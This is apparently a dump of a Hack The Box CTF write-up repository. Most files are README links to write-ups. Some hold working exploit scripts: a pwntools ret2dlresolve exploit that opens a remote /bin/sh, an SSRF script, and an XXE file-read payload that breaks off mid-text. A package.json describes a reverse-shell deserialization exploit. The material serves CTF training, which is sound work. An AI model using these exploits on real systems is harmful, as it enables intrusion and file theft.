-------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Crypto. Optimus Prime 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/crypto/optimus-prime 4 | -------------------------------------------------------------------------------- /Challenges/Crypto/Oracle Leaks/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Crypto. Oracle Leaks 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/crypto/oracle-leaks 4 | -------------------------------------------------------------------------------- /Challenges/Crypto/Space Pirates/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Crypto. Space Pirates 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/crypto/space-pirates 4 | -------------------------------------------------------------------------------- /Challenges/Crypto/Twin Oracles/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Crypto. Twin Oracles 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/crypto/twin-oracles 4 | -------------------------------------------------------------------------------- /Challenges/Crypto/Waiting List/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Crypto. Waiting List 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/crypto/waiting-list 4 | -------------------------------------------------------------------------------- /Challenges/Crypto/Zombie Rolled/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Crypto. Zombie Rolled 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/crypto/zombie-rolled 4 | -------------------------------------------------------------------------------- /Challenges/Crypto/secure source/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Crypto. secure source 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/crypto/secure-source 4 | -------------------------------------------------------------------------------- /Challenges/Misc/ExploitedStream/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Misc. ExploitedStream 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/misc/exploitedstream 4 | -------------------------------------------------------------------------------- /Challenges/Misc/Fentastic Moves/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Misc. Fentastic Moves 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/misc/fentastic-moves 4 | -------------------------------------------------------------------------------- /Challenges/Misc/Path of Survival/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Misc. Path of Survival 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/misc/path-of-survival -------------------------------------------------------------------------------- /Challenges/Misc/Type Exception/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Misc. Type Exception 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/misc/type-exception 4 | -------------------------------------------------------------------------------- /Challenges/Pwn/Bon-nie-appetit/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Pwn. Bon-nie-appetit 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/pwn/bon-nie-appetit 4 | -------------------------------------------------------------------------------- /Challenges/Pwn/Fleet Management/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Pwn. Fleet Management 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/pwn/fleet-management 4 | -------------------------------------------------------------------------------- /Challenges/Reversing/Rebuilding/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Reversing. Rebuilding 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/reversing/rebuilding 4 | -------------------------------------------------------------------------------- /Challenges/Reversing/The Vault/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Reversing. The Vault 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/reversing/the-vault 4 | -------------------------------------------------------------------------------- /Challenges/Web/Wild Goose Hunt/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Web. Wild Goose Hunt 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/web/wild-goose-hunt 4 | -------------------------------------------------------------------------------- /Challenges/Crypto/Biased Heritage/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Crypto. Biased Heritage 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/crypto/biased-heritage 4 | -------------------------------------------------------------------------------- /Challenges/Crypto/CryptoConundrum/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Crypto. CryptoConundrum 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/crypto/cryptoconundrum 4 | -------------------------------------------------------------------------------- /Challenges/Crypto/Not that random/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Crypto. Not that random 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/crypto/not-that-random 4 | -------------------------------------------------------------------------------- /Challenges/Crypto/One Step Closer/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Crypto. One Step Closer 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/crypto/one-step-closer 4 | -------------------------------------------------------------------------------- /Challenges/Crypto/Secure Signing/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Crypto. Secure Signing 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/crypto/secure-signing 4 | -------------------------------------------------------------------------------- /Challenges/Crypto/Signing Factory/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Crypto. Signing Factory 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/crypto/signing-factory 4 | -------------------------------------------------------------------------------- /Challenges/Crypto/hybrid unifier/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Crypto. hybrid unifier 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/crypto/hybrid-unifier 4 | -------------------------------------------------------------------------------- /Challenges/Misc/Branching Tactics/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Misc. Branching Tactics 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/misc/branching-tactics 4 | -------------------------------------------------------------------------------- /Challenges/Pwn/Ancient Interface/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Pwn. Ancient Interface 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/pwn/ancient-interface 4 | -------------------------------------------------------------------------------- /Challenges/Pwn/Great Old Talisman/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Pwn. Great Old Talisman 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/pwn/great-old-talisman 4 | -------------------------------------------------------------------------------- /Challenges/Reversing/Up a Stream/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Reversing. Up a Stream 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/reversing/up-a-stream 4 | -------------------------------------------------------------------------------- /Challenges/Web/BatchCraft Potions/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Web. BatchCraft Potions 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/web/batchcraft-potions 4 | -------------------------------------------------------------------------------- /Challenges/Crypto/Homomurphy's Law/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Crypto. Homomurphy's Law 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/crypto/homomurphys-law 4 | -------------------------------------------------------------------------------- /Challenges/Crypto/Infinite Descent/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Crypto. Infinite Descent 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/crypto/infinite-descent 4 | -------------------------------------------------------------------------------- /Challenges/Crypto/Partial Tenacity/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Crypto. Partial Tenacity 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/crypto/partial-tenacity 4 | -------------------------------------------------------------------------------- /Challenges/Crypto/Quadratic Points/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Crypto. Quadratic Points 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/crypto/quadratic-points 4 | -------------------------------------------------------------------------------- /Challenges/Crypto/baby quick maffs/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Crypto. baby quick maffs 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/crypto/baby-quick-maffs 4 | -------------------------------------------------------------------------------- /Challenges/Reversing/Potion Master/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Reversing. Potion Master 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/reversing/potion-master 4 | -------------------------------------------------------------------------------- /Challenges/Crypto/Colliding Heritage/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Crypto. Colliding Heritage 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/crypto/colliding-heritage 4 | -------------------------------------------------------------------------------- /Challenges/Crypto/Converging Visions/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Crypto. Converging Visions 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/crypto/converging-visions 4 | -------------------------------------------------------------------------------- /Challenges/Crypto/Down the Rabinhole/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Crypto. Down the Rabinhole 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/crypto/down-the-rabinhole 4 | -------------------------------------------------------------------------------- /Challenges/Crypto/Elliptic Labyrinth/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Crypto. Elliptic Labyrinth 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/crypto/elliptic-labyrinth 4 | -------------------------------------------------------------------------------- /Challenges/Crypto/Infinite Knapsack/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Crypto. Infinite Knapsack 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/crypto/infinite-knapsack 4 | -------------------------------------------------------------------------------- /Challenges/Crypto/Mind In The Clouds/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Crypto. Mind In The Clouds 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/crypto/mind-in-the-clouds 4 | -------------------------------------------------------------------------------- /Challenges/Misc/Emdee five for life/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Misc. Emdee five for life 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/misc/emdee-five-for-life 4 | -------------------------------------------------------------------------------- /Challenges/Reversing/Spooky License/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Reversing. Spooky License 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/reversing/spooky-license 4 | -------------------------------------------------------------------------------- /Challenges/Crypto/Digital Safety Annex/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Crypto. Digital Safety Annex 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/crypto/digital-safety-annex 4 | -------------------------------------------------------------------------------- /Challenges/Crypto/Find Marher's Secret/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Crypto. Find Marher's Secret 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/crypto/find-marhers-secret 4 | -------------------------------------------------------------------------------- /Challenges/Crypto/Hash the Filesystem/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Crypto. Hash the Filesystem 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/crypto/hash-the-filesystem 4 | -------------------------------------------------------------------------------- /Challenges/Crypto/Jenny From The Block/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Crypto. Jenny From The Block 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/crypto/jenny-from-the-block 4 | -------------------------------------------------------------------------------- /Challenges/Crypto/Living with Elegance/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Crypto. Living with Elegance 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/crypto/living-with-elegance 4 | -------------------------------------------------------------------------------- /Challenges/Forensics/Deadly Arthropod/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Forensics. Deadly Arthropod 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/forensics/deadly-arthropod 4 | -------------------------------------------------------------------------------- /Challenges/Pwn/Dream Diary: Chapter 3/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Pwn. Dream Diary: Chapter 3 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/pwn/dream-diary-chapter-3 4 | -------------------------------------------------------------------------------- /Challenges/Pwn/Sacred Scrolls: Revenge/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Pwn. Sacred Scrolls: Revenge 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/pwn/sacred-scrolls-revenge 4 | -------------------------------------------------------------------------------- /Challenges/Crypto/Android-in-the-Middle/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Crypto. Android-in-the-Middle 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/crypto/android-in-the-middle 4 | -------------------------------------------------------------------------------- /Challenges/Crypto/The Three-Eyed Oracle/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Crypto. The Three-Eyed Oracle 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/crypto/the-three-eyed-oracle 4 | -------------------------------------------------------------------------------- /Challenges/Pwn/Space pirate: Retribution/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Pwn. Space pirate: Retribution 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/pwn/space-pirate-retribution 4 | -------------------------------------------------------------------------------- /Challenges/Forensics/Halloween Invitation/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Forensics. Halloween Invitation 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/forensics/halloween-invitation 4 | -------------------------------------------------------------------------------- /Challenges/Misc/Computational Recruiting/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Misc. Computational Recruiting 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/misc/computational-recruiting 4 | -------------------------------------------------------------------------------- /Challenges/Pwn/Space pirate: Going Deeper/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Pwn. Space pirate: Going Deeper 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/pwn/space-pirate-going-deeper 4 | -------------------------------------------------------------------------------- /Challenges/Misc/A Nightmare On Math Street/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Misc. A Nightmare on Math Street 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/misc/a-nightmare-on-math-street 4 | -------------------------------------------------------------------------------- /Challenges/Crypto/How The Columns Have Turned/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Crypto. How The Columns Have Turned 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/crypto/how-the-columns-have-turned 4 | -------------------------------------------------------------------------------- /Machines/Antique/decode.py: -------------------------------------------------------------------------------- 1 | import binascii 2 | import sys 3 | 4 | 5 | def main(): 6 | bits = sys.argv[1:] 7 | 8 | try: 9 | print(''.join(map(lambda x: x.decode(), map(binascii.unhexlify, bits)))) 10 | except binascii.Error as e: 11 | print('binascii.Error', e) 12 | 13 | 14 | if __name__ == '__main__': 15 | main() 16 | -------------------------------------------------------------------------------- /Challenges/Misc/Emdee five for life/solve.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | host=$1 4 | 5 | if [ -z "$host" ]; then 6 | echo "bash $0 " 7 | exit 1 8 | fi 9 | 10 | res=$(curl -si $host) 11 | cookie=$(grep -oE 'Cookie: .*?;' <<< $res | tr -d ';') 12 | 13 | string=$(grep -oE "

.*?

" <<< $res) 14 | md5=$(echo -n ${string:19:20} | md5sum | awk '{ print $1 }') 15 | 16 | curl -H "$cookie" -sd hash=$md5 $host | grep -oE 'HTB{.*?}' 17 | -------------------------------------------------------------------------------- /Challenges/Crypto/baby quick maffs/solve.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | def main(): 4 | with open('output.txt') as f: 5 | N = int(f.readline()) 6 | remainder = int(f.readline()) 7 | a, b, c = eval(f.readline()) 8 | 9 | m1 = pow(2 * remainder, -1, N) * (c - a - remainder ** 2) % N 10 | m = m1 + m1 + remainder 11 | 12 | print(bytes.fromhex(hex(m)[2:]).decode()) 13 | 14 | 15 | if __name__ == '__main__': 16 | main() 17 | -------------------------------------------------------------------------------- /Machines/Rope/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Machines. Rope 2 | 3 | Machine write-up: https://7rocky.github.io/en/htb/rope 4 | 5 | ### `fmtstr_exploit.py` 6 | 7 | This Format String exploit is nicely explained in the [write-up](https://7rocky.github.io/en/htb/rope/#format-string-exploitation) 8 | 9 | ### `root_exploit.py` 10 | 11 | The [write-up](https://7rocky.github.io/en/htb/rope/#buffer-overflow-exploitation) provides the needed information to exploit the Buffer Overflow vulnerability of the corresponding binary. 12 | -------------------------------------------------------------------------------- /Machines/NodeBlog/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "author": "7Rocky", 3 | "dependencies": { 4 | "axios": "^0.24.0" 5 | }, 6 | "description": "Obtain a reverse shell exploiting an insecure deserialization vulnerability", 7 | "keywords": ["rce", "insecure deserialization", "node-serialize", "reverse shell", "node"], 8 | "license": "ISC", 9 | "main": "unserialize_rce.js", 10 | "name": "node-blog", 11 | "scripts": { 12 | "test": "echo \"Error: no test specified\" && exit 1" 13 | }, 14 | "version": "1.0.0" 15 | } 16 | -------------------------------------------------------------------------------- /Machines/Hancliffe/encrypt1.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int main(int argc, char** argv) { 5 | int i; 6 | int length; 7 | char c; 8 | char* s; 9 | 10 | s = argv[1]; 11 | length = strlen(s); 12 | 13 | for (i = 0; i < length; i++) { 14 | if (0x20 < s[i] && s[i] != 0x7f) { 15 | c = (char) (s[i] + 0x2f); 16 | 17 | if (s[i] + 0x2f < 0x7f) { 18 | s[i] = c; 19 | } else { 20 | s[i] = c - 0x5e; 21 | } 22 | } 23 | } 24 | 25 | puts(s); 26 | 27 | return 0; 28 | } 29 | -------------------------------------------------------------------------------- /Machines/Forge/ssrf.py: -------------------------------------------------------------------------------- 1 | import re 2 | import requests 3 | import sys 4 | 5 | 6 | def main(): 7 | url = sys.argv[1] 8 | 9 | r = requests.post('http://forge.htb/upload', {'url': url, 'remote': 1}) 10 | 11 | if 'http://forge.htb' not in r.text: 12 | print(re.findall(r'(.*?)', r.text)[0]) 13 | exit() 14 | 15 | upload_url = re.findall(r'', r.text)[0] 16 | 17 | r = requests.get(upload_url) 18 | print(r.text) 19 | 20 | 21 | if __name__ == '__main__': 22 | main() 23 | -------------------------------------------------------------------------------- /Challenges/Misc/Emdee five for life/solve.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import hashlib 4 | import re 5 | import requests 6 | import sys 7 | 8 | 9 | def main(): 10 | if len(sys.argv) == 1: 11 | print('Usage: python3', sys.argv[0], '') 12 | exit(1) 13 | 14 | url = f'http://{sys.argv[1]}' 15 | s = requests.session() 16 | 17 | r = s.get(url) 18 | 19 | md5 = hashlib.md5(r.content[167:187]).hexdigest() 20 | r = s.post(url, data={'hash': md5}) 21 | 22 | print(re.findall(r'HTB\{.*?\}', r.text)[0]) 23 | 24 | 25 | if __name__ == '__main__': 26 | main() 27 | -------------------------------------------------------------------------------- /Challenges/Pwn/Void/solve.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | context.binary = 'void' 6 | 7 | rop = ROP(context.binary) 8 | dlresolve = Ret2dlresolvePayload(context.binary, symbol='system', args=['/bin/sh\0']) 9 | rop.read(0, dlresolve.data_addr) 10 | rop.raw(rop.ret[0]) 11 | rop.ret2dlresolve(dlresolve) 12 | raw_rop = rop.chain() 13 | 14 | if len(sys.argv) == 1: 15 | p = context.binary.process() 16 | else: 17 | host, port = sys.argv[1].split(':') 18 | p = remote(host, port) 19 | 20 | p.sendline(b'A' * 72 + raw_rop) 21 | p.sendline(dlresolve.payload) 22 | p.interactive() 23 | -------------------------------------------------------------------------------- /Machines/Spider/xxe.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | file=$1 4 | 5 | data="username=BEGINTAG 6 | %26xxe; 7 | ENDTAG&version=1.33.7 --> 8 | ]> 9 |